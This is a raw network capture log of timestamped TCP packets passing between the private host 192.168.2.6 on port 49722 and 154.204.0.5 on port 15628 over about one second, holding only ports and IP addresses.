Jul 20, 2024 16:31:40.034938097 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.035001993 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.057394981 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.057461977 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.062490940 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.062552929 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.067717075 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.067770958 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.072761059 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.072818995 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.078037024 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.078104973 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.083158970 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.083224058 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.088929892 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.088987112 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.094543934 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.094603062 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.099668980 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.099728107 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.105480909 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.105557919 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.110702991 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.110776901 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.115679026 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.115742922 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.121340036 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.121414900 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.126657009 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.126720905 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.152041912 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.155200005 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.165600061 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.165688038 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.173497915 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.173567057 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.178909063 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.178966999 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.186359882 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.186459064 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.191740990 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.191797972 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.197349072 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.197412968 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.202349901 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.202431917 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.207345009 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.207411051 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.212555885 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.212614059 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.217556000 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.217611074 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.222650051 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.222714901 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.227696896 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.227761030 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.232991934 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.233052015 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.238010883 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.238080025 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.243057966 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.243122101 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.248018980 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.248076916 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.254398108 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.254462004 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.259633064 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.259685993 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.265036106 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.265100002 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.270685911 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.270746946 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.275671005 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.275727034 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.280688047 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.280739069 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.285893917 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.285958052 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.290911913 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.290971994 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.295845032 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.295902014 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.300875902 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.300930977 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.305986881 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.306037903 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.311028957 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.311084032 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.316476107 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.316540003 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.321630955 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.321690083 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.326572895 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.326627016 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.331640959 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.331696033 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.336833954 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.336905003 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.341866016 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.341917992 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.347531080 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.348457098 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.353338957 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.353461027 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.358403921 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.367460966 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.380225897 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.380283117 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.386101007 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.386354923 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.391328096 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.391387939 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.396305084 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.396516085 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.401565075 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.401639938 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.406544924 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.406651974 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.411530018 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.411604881 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.417066097 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.417231083 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.422221899 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.422333002 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.427611113 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.427740097 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.432594061 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.432780027 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.438056946 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.438127041 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.443069935 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.443135023 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.448072910 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.448137999 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.452997923 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.453057051 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.457880020 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.457947016 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.462822914 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.462883949 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.467808962 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.467865944 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.472803116 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.472974062 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.477941036 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.477999926 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.482839108 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.484797955 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.490113974 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.493653059 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.498707056 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.499834061 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.504785061 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.505665064 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.510778904 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.511683941 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.517522097 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.518297911 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.523699999 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.529716015 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.534652948 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.537785053 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.542846918 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.544684887 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.549658060 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.553755045 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.558856964 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.559693098 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.564668894 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.565079927 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.569998980 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.570296049 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.575268984 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.578114986 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.583777905 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.589881897 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.594849110 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.595649004 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.600753069 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.601821899 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.606894016 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.607691050 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.628755093 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.629290104 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.638952971 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.640685081 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.667637110 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.697586060 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.720877886 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.748501062 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.774185896 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.799525976 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.825330019 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.853483915 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.866580963 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.871839046 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.872078896 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.872128963 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.872157097 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.872509956 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.872634888 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.872663975 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.872690916 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.872718096 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.872745037 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.872771025 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.872797012 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.872823000 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.872849941 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.872875929 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.872888088 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.872967958 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.872994900 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.877407074 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.877599955 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.882611036 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.883743048 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.889163017 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.890469074 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.895587921 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.901755095 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.906883955 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.907562971 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.912405968 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.913779020 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.918612003 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.919665098 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.924581051 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.925852060 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.930854082 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.931881905 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.936762094 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.937798023 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.942634106 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.943567038 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.948462009 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.949820042 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.955773115 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.961731911 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.966626883 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.967595100 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.972549915 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.973519087 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.980827093 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.985759020 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.990928888 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.991595030 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.996931076 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.997453928 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:41.002979040 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:41.003710985 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:41.011393070 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:41.011650085 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:41.025441885 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:41.027705908 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:41.052787066 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:41.056462049 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:41.057801962 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:41.058202982 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:41.058558941 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:41.069093943 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:41.069926023 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:41.078815937 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:41.081701994 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:41.086580992 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:41.087768078 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:41.093161106 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:41.095705032 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:41.100703955 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:41.101703882 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:41.107547998 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:41.107940912 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:41.112987041 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:41.113745928 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:41.118910074 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:41.119018078 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:41.124046087 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:41.125847101 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:41.152339935 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:41.156060934 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:41.160984039 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:41.165707111 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:41.171052933 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:41.173791885 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:41.178745985 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:41.181732893 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:41.186638117 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:41.186852932 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:41.192008972 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:41.193739891 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:41.198899984 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:41.200612068 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:41.205538988 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:41.211651087 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:41.216725111 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:41.217108011 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:41.222146988 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:41.223141909 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:41.228383064 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:41.228692055 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:41.233604908 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:41.233807087 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:41.238689899 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:41.241506100 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:41.246984005 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:41.247839928 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:41.270350933 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:41.273678064 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:41.279175997 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:41.281805992 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:41.288000107 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:41.288285017 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:41.293332100 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:41.293458939 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:41.298274040 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:41.298635960 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:41.303740025 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:41.304002047 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:41.311666012 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:41.311781883 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:41.316860914 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:41.317801952 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:41.322870016 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:41.322962046 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:41.332175970 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:41.332456112 CEST	49722	15628	192.168.2.6	154.204.0.5
